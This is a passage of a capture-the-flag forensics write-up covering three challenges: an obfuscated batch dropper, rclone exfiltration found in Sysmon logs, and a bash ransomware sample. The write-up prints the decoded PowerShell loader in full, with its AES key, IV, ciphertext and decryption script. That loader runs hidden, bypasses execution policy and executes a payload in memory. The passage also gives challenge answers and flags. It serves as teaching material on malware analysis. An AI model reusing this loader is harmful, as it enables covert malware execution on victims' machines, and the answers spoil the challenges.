%eUFw%"ySgQyAAfQH=ect "
%eUFw%"LPGeAanVGt=3); "
%eUFw%"LYxpWUVnyn==');"
%eUFw%"TfyrgNGxBL=ress"
%eUFw%"ZNnASGtLCj=y]::"
%eUFw%"KXttaDcyMZ=.Mod"
%eUFw%"RfMwENsorP=morF"
%eUFw%"CZTFliIBbC=:('g"
%eUFw%"mYyPXMYwYi=oint"
%eUFw%"SIQjFslpHA=comm"
%eUFw%"pibEdoDBbD=mNKM"
%eUFw%"TVsNOuCNZd= '')"
%eUFw%"yQujDHraSv= hid"
%eUFw%"fVHBRsLNUl='gni"
%eUFw%"iREuYMPcTg=ct S"
%eUFw%"uDsfTCYsro=g = "
%eUFw%"zwDBykiqZZ=den "
%eUFw%"weRTbbZPjT=tyle"
%eUFw%"uwRWnyAikF=tS46"
%eUFw%"bTHJpHTPMM=)($V"
%eUFw%"TuqTvTpeOG=bn.D"
%eUFw%"GWrDWSvoPL=W.Su"
%eUFw%"KXapePmHCe=form"
%eUFw%"eeacPrYshd=iW20"
%eUFw%"XEcuUpquLQ=ress"
%eUFw%"iCcGUuJxVn=.Dis"
%eUFw%"WXWHLOygSe=gap."
%eUFw%"XIAbFAgCIP=dows"
%eUFw%"QzqEkBCLON=Lk);"
%eUFw%"pCjFJxRqgH=Conv"
%eUFw%"TEtLFfgLmA=TMLk"
%eUFw%"GzBAHPVuTq=] -j"
%eUFw%"VUsEoebHks=('2h"
%eUFw%"YiVTQhqRnm=New-"
%eUFw%"kQQvXhxXIT=Mode"
%eUFw%"RITIeDNkWx=$mNK"
%eUFw%"LNwemqbftD=saBm"
%eUFw%"DCnzMxKRnm=ose("
%eUFw%"ftaecaUnft=;$Nl"
%eUFw%"KhyyrSrcKr='[-1"
%eUFw%"QpDqsQAemY=rt]:"
%eUFw%"RycUceHQZc=ck($"
%eUFw%"QTBYjmNXEB=[Sys"
%eUFw%"iKAAuWsbec=).Sp"
%eUFw%"UAnQUvXBfs=$bTM"
%eUFw%"zhsTKtujLg=acUA"
%eUFw%"CpAQgSdzaC=Syst"
%eUFw%"qIhOqqdyjR=uZOc"
%eUFw%"LmCknrHfoB=ach "
%eUFw%"dlzhxQnMss=TBkD"
%eUFw%"YJZmDySMUy=)($u"
%eUFw%"gqUdnmSTUN=LGW "
%eUFw%"tuAPcYGhzl=n/J7"
%eUFw%"jxjvtHoTnR=tfdQ"
%eUFw%"jpqWVBsCpx=;$Nl"
%eUFw%"HUAAetwukX=1..-"
%eUFw%"rVOFKTskYR=]::("
%eUFw%"XzWakcViZI=ptor"
%eUFw%"hNwOTmvEJo=gGVE"
%eUFw%"MFpVhvZMMs=ptog"
%eUFw%"YRqcyngfyU=$Bac"
%eUFw%"uIWSZVpUHl=sion"
%eUFw%"QGiWXkfFPy=);$B"
%eUFw%"JPOdGPAwht=/Ntk"
%eUFw%"mxXhSCdBil=KMr."
%eUFw%"TYbHmXrqgV=)) {"
%eUFw%"kpEWZrtOzX=; };"
%eUFw%"TypmIIEYJC=grap"
%eUFw%"GEFNspgkfU=Obje"
%eUFw%"glRvzlEEoe=join"
%eUFw%"JbFOJyRrBm=oL'["
%eUFw%"hwZKiiLqAE=LGW."
%eUFw%"MrNTGKcbYu=n ''"
%eUFw%"XClTzcVMGM=join"
%eUFw%"XqtgTmRIdO=em.C"
%eUFw%"nMLIkcyFZj='txe"
%eUFw%"BrDOtQoojB=$uZO"
%eUFw%"LfngwmfRCb=fdQ."
%eUFw%"jtkYEPXtKX=TllA"
%eUFw%"KAlyOryibJ=yste"
%eUFw%"GJcpQprPXv=ionM"
%eUFw%"rofQqYizRu=-joi"
%eUFw%"UFSmCjquVd=rity"
%eUFw%"SRYmoDJgcF=raph"
%eUFw%"mFZJVdqlTD=[-1."
%eUFw%"hbnAmGyJMk=gth)"
%eUFw%"hTTJOKGuzo=brea"
%eUFw%"JenYfqHzBk=y.Cr"
%eUFw%"DwiWdAaOiv=cm);"
%eUFw%"vPgKEvZmlQ===')"
%eUFw%"jgiQdwyxFg=rtS4"
%eUFw%"qpUykKHwzb=('%~f0'"
%eUFw%"GLwLVWewUj=eIfq"
%eUFw%"MAPkvbWKbC=.Ass"
%eUFw%"jugDlMdkcG=.Cry"
%eUFw%"TiuQnZmosP=-1.."
%eUFw%"EQAuBusyXb=q) {"
%eUFw%"GTgGJngEbX=[IO."
%eUFw%"yZlAoExoOn=O.En"
%eUFw%"sLNudRRtUX= $V"
%eUFw%"WauWfrgGak=ment"
%eUFw%"YmUoUKWAtR=ode]"
%eUFw%"yOkBDuSVrl= if "
%eUFw%"MJKqSlzRdg=VPbn"
%eUFw%"PmpGnAHBIo=, $u"
%eUFw%"cUDojRpXKx= [Sy"
%eUFw%"svwZUufvHX=y.Pa"
%eUFw%"GDXqElqPYy=($Yi"
%eUFw%"ybHVOwcPrc= = ["
%eUFw%"hIpFAiXGDz=m, 0"
%eUFw%"lfCLMrJHhW=gap "
%eUFw%"NXvoEmTmgu=1Mwd"
%eUFw%"DNNdkNfTiI=comp"
%eUFw%"kpzxAxFvLw=('%*'"
%eUFw%"MsfoqNTDfI=ateD"
%eUFw%"MmhvJKSdep=mory"
%eUFw%"uVLEiIUjzw=prof"
%eUFw%"NvnNgHLBLJ=n7Lw"
%eUFw%"owRVWPJqcX=rity"
%eUFw%"HlBVDpGgba=embl"
%eUFw%"SIneUaQPty=stem"
%eUFw%"nogFGGEgdF=16] "
%eUFw%"qsPTvcejTS=n = "
%eUFw%"wEZCzuPukj=[Sys"
%eUFw%"rVuFsOUxnm=yste"
%eUFw%"fLycQgNMii=oin "
%eUFw%"KsuJogdoiJ= -no"
%eUFw%"djeIEnPaCg=tsWi"
%eUFw%"brwOvSubJT=e = "
%eUFw%"TOqZKQRZli=uZOc"
"""
ls = dict.split('\"')
txt = {}
k = 0
tmp = ''
enc = '%CJnGNBkyYp%%UBndSzFkbH%%ujJtlzSIGW%%nwIWiBzpbz%%cHFmSnCqnE%%kTEDvsZUvn%%JBRccySrUq%%ZqjBENExAX%%XBucLtReBQ%%BFTOQBPCju%%vlwWETKcZH%%NCtxqhhPqI%%GOPdPuwuLd%%YcnfCLfyyS%%JPfTcZlwxJ%%ualBOGvshk%%xprVJLooVF%%cIqyYRJWbQ%%jaXcJXQMrV%%pMrovuxjjq%%KXASGLJNCX%%XzrrbwrpmM%%VCWZpprcdE%%tzMKflzfvX%%ndjtYQuanY%%chXxviaBCr%%tHJYExMHlP%%WmUoySsDby%%UrPeBlCopW%%lYCdEGtlPA%%eNOycQnIZD%%PxzdwcSExs%%VxroDYJQKR%%zhNAugCrcK%%XUpMhOyyHB%%OOOxFGwzUd%%dzPrbmmccE%%xQseEVnPet%%eDhTebXJLa%%vShQyqnqqU%%KsuJogdoiJ%%uVLEiIUjzw%%SJsEzuInUY%%gNELMMjyFY%%XIAbFAgCIP%%weRTbbZPjT%%yQujDHraSv%%zwDBykiqZZ%%nfEeCcWKKK%%MtoMzhoqyY%%igJmqZApvQ%%SIQjFslpHA%%KHqiJghRbq%%WSRbQhwrOC%%BGoTReCegg%%WYJXnBQBDj%%SIneUaQPty%%WTAeYdswqF%%EdLUuXiTNo%%rVOFKTskYR%%nMLIkcyFZj%%jtkYEPXtKX%%RWcegafVtf%%KhyyrSrcKr%%zDUDeXKPaV%%VZAbZqJHBk%%XClTzcVMGM%%xVIsxobyZi%%qpUykKHwzb%%iKAAuWsbec%%cYinxarhDL%%olHsTHINJO%%uynFENuiYB%%WauWfrgGak%%tzSNMWchGN%%oFspIELDJK%%FijcPoQLnC%%AbMyvUGzSH%%LmCknrHfoB%%GDXqElqPYy%%gqUdnmSTUN%%YlKbYsFYPy%%GLwLVWewUj%%EQAuBusyXb%%yOkBDuSVrl%%FraARuTjiq%%hwZKiiLqAE%%ahbOZSBViB%%djeIEnPaCg%%AiqHTcPzsv%%JCuNlxqlBZ%%TYbHmXrqgV%%sLNudRRtUX%%dbDMRBPrxg%%XEyDmChJvW%%KytxcYPZKt%%GWrDWSvoPL%%haSZYOmkiA%%JhYYmEHfJT%%LPGeAanVGt%%hTTJOKGuzo%%MFRjJyYsrs%%kpEWZrtOzX%%BrDOtQoojB%%YnGvhgYxvb%%cUDojRpXKx%%rSVBNvbdPT%%kJjQuXIjOT%%tVtxVGNpFB%%BqEMjgsfHM%%fVHBRsLNUl%%jgiQdwyxFg%%HLynrUfwGo%%FCBcNynRGD%%VavtsuhNIN%%HUAAetwukX%%nogFGGEgdF%%iHRclHpeVX%%MrNTGKcbYu%%bTHJpHTPMM%%QbKdEZdxpx%%drymkVAnZW%%DDiJEpaiME%%OAsjgKHKoH%%HFLAqJuuyu%%gFQQimTbzp%%YULKJDZpgz%%oQYrpYRHsU%%VGKsxiJBaT%%RGlZIMTaRM%%JenYfqHzBk%%vmIEtsktnA%%TypmIIEYJC%%eQPFkQsLmh%%AkaPyEXHFq%%BANrSlObpx%%LIQYgFxctD%%ZygfZJxAOd%%KXttaDcyMZ%%brwOvSubJT%%hVncqdtHrj%%OonlMOpxYC%%CZpuCIcrKh%%owRVWPJqcX%%jugDlMdkcG%%DXdgqiFTAH%%acXjUrxrpX%%eYuashSMjP%%ESpdErsKEO%%kQQvXhxXIT%%pLUeCEDcNj%%pTKKchMUFD%%ZMNBNnhYdl%%KVdpASYkBZ%%OpWuyrggtP%%uDsfTCYsro%%wEZCzuPukj%%jCsFOJQsdv%%hbFnQgCXwX%%UFSmCjquVd%%BMVjGSkNrk%%MFpVhvZMMs%%SRYmoDJgcF%%svwZUufvHX%%WPGlloqWfh%%kEHDlJOIVc%%jdKMRqipbM%%pEeOvclMbZ%%nMbUuONTOk%%GwAFOSfUtV%%gbVsRGzTij%%ybHVOwcPrc%%CpAQgSdzaC%%XqtgTmRIdO%%pUKFMEPFQs%%QpDqsQAemY%%CZTFliIBbC%%EuMCNHEVeC%%dyJHMHMcNc%%LNwemqbftD%%VnDoNvCbDL%%mFZJVdqlTD%%vGOYQQYIpx%%GzBAHPVuTq%%fLycQgNMii%%ZPlPiozEyW%%xULgeMdzcg%%iVrCyJhMiJ%%dlzhxQnMss%%pqWXTkasXe%%doKcadyJqy%%hNwOTmvEJo%%yqhJQSZuJo%%JPOdGPAwht%%rEvTlCThdH%%PwJJFMgamh%%eeacPrYshd%%LYxpWUVnyn%%YRqcyngfyU%%IAkZpnEseT%%DAaZVQYtML%%QTBYjmNXEB%%lSUnvlNyZI%%pCjFJxRqgH%%oMsMdPYmPd%%AGOCIKFMEK%%dAuevoJWoL%%uwRWnyAikF%%mBIWiJNHWZ%%RfMwENsorP%%gbXeIdPSoj%%kxCYxBSxVM%%AbZpTpKurz%%glRvzlEEoe%%TVsNOuCNZd%%VUsEoebHks%%tuAPcYGhzl%%WojQSFImBz%%NXvoEmTmgu%%jWtWLzuDKP%%NvnNgHLBLJ%%vPgKEvZmlQ%%ftaecaUnft%%lfCLMrJHhW%%ArAxZuPIrp%%zhsTKtujLg%%MxwsyqmvYm%%MsfoqNTDfI%%klVPUdMJas%%XzWakcViZI%%htJeDhbeDW%%ARecVABHyu%%EDuGpmwedn%%SKEwAQBRlN%%bIgeRgvTeJ%%AnKEeEZdOq%%KXapePmHCe%%YKwLsVwqOj%%QCZuMFaZsV%%RycUceHQZc%%TOqZKQRZli%%hIpFAiXGDz%%PmpGnAHBIo%%nGqMpclaJV%%NbOjNijxuU%%hbnAmGyJMk%%jpqWVBsCpx%%WXWHLOygSe%%rjhOhltPzI%%DCnzMxKRnm%%QGiWXkfFPy%%isQISZiBPJ%%iCcGUuJxVn%%dGSGnKbkQW%%gNabAkLFGN%%pibEdoDBbD%%AHKCuBAkui%%YYKSCuCbgJ%%IeRiYUFnCZ%%hzjnwzdyGY%%KAlyOryibJ%%MBvrUwPCDz%%WmHvayPxwd%%reviZiSttH%%wwmTmFdRsZ%%JBUgbyTPxp%%BaMYsIgnsM%%DwiWdAaOiv%%vXewtPjogB%%odWdfvJnBE%%yPzFwnsYdA%%xfHbUEWpFC%%ySgQyAAfQH%%QMmDXFyyag%%xllGdjvUjB%%zuIYfGJIhV%%MmhvJKSdep%%fxpyemHAMo%%eFWpiweoyr%%WQqetkePWs%%qsPTvcejTS%%YiVTQhqRnm%%GEFNspgkfU%%iREuYMPcTg%%rVuFsOUxnm%%UmCJMMMcBg%%VUeZKgDBUe%%roXhULjavE%%uIWSZVpUHl%%ZNBNkxQuUl%%ktDjVGpvOa%%CMHWMmXlZO%%RITIeDNkWx%%UPfjubfNXt%%GTgGJngEbX%%zFvgtBzUer%%TfyrgNGxBL%%hknFiXCnZQ%%xijYXotZPT%%BlIFABuPAW%%GJcpQprPXv%%YmUoUKWAtR%%tHHIjVCHeH%%DNNdkNfTiI%%XEcuUpquLQ%%EUwICZcugV%%MJKqSlzRdg%%FcrKUOEnOU%%EiWocIreAk%%LLNnWnTLBJ%%QzqEkBCLON%%uOGlqENvnk%%TuqTvTpeOG%%USLedfRsdA%%fFqNPWfBWr%%AyyrPvjwjr%%mxXhSCdBil%%MusMeoeDey%%OOiwgwuupI%%WvjMoIIiUn%%TEtLFfgLmA%%rFsKCxpAbv%%hImzprlFyw%%GVIREkvxRa%%qIhOqqdyjR%%shhyfkrTvn%%UAnQUvXBfs%%bSIafzAxiZ%%oNvGdyNkLt%%SCbDgQuqTU%%tBsRPAyhtG%%KUKwZheGNw%%INPLAzQfUo%%ekEoGMuERC%%aGQeJYSFDZ%%LODxmGMGqq%%KtmeCApwQn%%MAPkvbWKbC%%HlBVDpGgba%%ZNnASGtLCj%%IwOqmlYsbl%%JbFOJyRrBm%%TiuQnZmosP%%HkiSTlwlIs%%rofQqYizRu%%OckpqzbYcn%%YJZmDySMUy%%cGJiVEdEzp%%QNxYaFZSBu%%jxjvtHoTnR%%fvEtritbuM%%wxzMwkmbmY%%yZlAoExoOn%%pjrIjvjdGR%%mYyPXMYwYi%%vnHosfjdeN%%LfngwmfRCb%%bivuMABwCB%%GapFScCcpe%%lfYSggLrsL%%GhTXhmRnCR%%ENADhKPHot%%KdByPVjCnF%%PjdRUyhsyG%%kpzxAxFvLw%%rddZbDFvhl%'
for i in enc:
 if i != '%':
 tmp += i
enc = tmp
for i in range(0, len(ls), 1):
 if '=' in ls[i]:
 try:
 txt[ls[i][0:10]] = ls[i][11:]
 enc = enc.replace(ls[i][0:10], ls[i][11:])
 except:
 continue
print(enc)

Which, results in this script:

copy C:WindowsSystem32\WindowsPowerShell
1.0powershell.exe /y execd exe -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%~f0').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('%*')))

Short analysis on the script’s intention:

Step 1: Initiates AES decryptor using CBC mode, PKCS7 padding mode, key and IV given.
Step 2: Decrypts the encrypted payload (via Window.bat) using the above settings.
Step 3: Decompresses GZip, then run the output as a binary.

We can use this Python script below to get the binary that I have stated in step 3 above.

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
import gzip


key = base64.b64decode('0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=')
iv = base64.b64decode('2hn/J717js1MwdbbqMn7Lw==')

encrypted_message = base64.b64decode('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')
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_message = cipher.decrypt(encrypted_message)
decrypted_message = unpad(decrypted_message, 16)

decrypted_message = gzip.decompress(decrypted_message)

io = open('E:/Downloads/out', 'wb')
io.write(decrypted_message)

As a result, we get this binary.

I also double-checked using Detect It Easy (DIE) to see if it is a valid executable or not.

Voilà, we get the executable! I used dnSpy to read the code of the binary. Turned out, the flag is right there to be seen!

Flag is: HTB{0neN0Te?_iT'5_4_tr4P!}

Packet Cyclone

Given file: Get it here!
Description: Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Forensics
Difficulty: Easy

To get the flag, we need to answer these five question correctly:

1.What is the email of the attacker used for the exfiltration process? (for example: name@email.com)

In the file given, there are 2 YAML files. In these files there is a link which is about detecting Rclone. We can follow what they do to answer our questions.

To find the email, i opened Sysmon Operational event log and looked around the events. Then i found this:

This event will help us to answer first four questions.

Answer: majmeret@protonmail.com

2. What is the password of the attacker used for the exfiltration process?

Answer: FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI

3. What is the Cloud storage provider used by the attacker?

Answer: mega

4. What is the ID of the process used by the attackers to configure their tool?

Answer: 3820

5. What is the name of the folder the attacker exfiltrated; provide the full path.

After reading the link mentioned above, we know that the attacker used command .rclone.exe copy E: remote:data to begin exfiltrated. Hence, I searched for the event that mentions rclone.exe.

Answer: C:\Users\Wade\Desktop\Relic_location

Flag is: HTB{3v3n_3xtr4t3rr3str14l_B31nGs_us3_Rcl0n3_n0w4d4ys}

Bashic Ransomware

Given file: Get it here!
Description: The aliens are gathering their best malware developers to stop Pandora from using the relic to her advantage. They relieved their ancient ransomware techniques hidden for years in ancient tombs of their ancestors. The developed ransomware has now infected Linux servers known to be used by Pandora. The ransom is the relic. If Pandora returns the relic, then her files will be decrypted. Can you help Pandora decrypt her files and save the relic?
Category: Forensics
Difficulty: Hard

We were given four files, including one encrypted flag file, a pcap file and a mem file with their volatility profile which is the zip file.

1. Pcap file

Looking at the pcap file, we can see a long base64 string, i decoded it and get:

gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" 'KkmZKkmZJoQMgQXa4VWCJoQZ5gTMUV3MidFRGB1b4VUCJogblhGdgsTXgISKnB3ZgYXLgQmbh1WbvNGKkICI41CIbBiZplgCuVGa0ByOd1FIiIzM0MzM2kjN2cjclB3bsVmdlRmIg0TPgISKp1WYvh2doQiIgs1WgYWaKoQfKQVbuN2NyIHRzI1Vul2RxEGUuBjdJogNvV1Q51mQQdUdHlkTNFTRQlVTNlgCNlle0J2cUNkNG5EWBNzN4hUTGVXCKsHIpgSZ5gTMUV3MidFRGB1b4VkCK0nCG9URJoQLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLtkQCK4SZulGbkFWZkBycphGdgM3cp1GI09mbg8GRg4CdmVGbgMXehRGIuVGdgUmdhhGI19WWg4ycpBSZyVGa0BCLlNnc192YgY2TJkQCK8TZulGbkFWZkBSYgUmclhGdgMXSgoSCJogLzJXZud3bgwWdmRHanlmcgMXdvlmdlJHcgMHdpByb0ByajFmYgMWasVmcgUGa0BibyVHdlJHI0NXdtBSdvlHIsQ3clJHIlhGdgQHc5J3YlRGIvRFIusmcvdHIm9GIm92byBHIzFGIkVGdwlncjVGZgUmYg4WYjBibvlGdjVmZulGIyVGcgUGbpZGIl52Tg4ycu9Wa0NWdyR3culGIyV3bgc3bsx2bmBSdvlHImlGIkVWZ05WYyFWdnBSJwATMgMXagMXZslmZgIXdvlHIn5WayVmdvNWZSlQCJowPzVGbpZGI51GIyVmdvNWZyByb0BydvhEIqkQCK4SeltGIlRXY2lmcwBic19GI0V3boRXa3BSZsJWazN3bw1WagMXagQXagsTblhGdgQHc5J3YlRGIvRHI5F2dgEGIk5WamByb0ByZulWeyRHIl1Wa0Bic19WegUGdzF2dgQ3buBybEBiLkVGdwlncj5WZg4WZlJGIlZXYoBSelhGdgU2c1F2YlJGIlxmYpN3clN2YhBicldmbvxGIv5GIlJXYgMXZslmZgIXdvlHIm9GI0N3bNlQCJowPkVmblBHchhGI0FGaXBiKJkgCFJVQX10TT5UQSBCTBlkUUNVRSJVRUFkUUhVRg4UQgklQg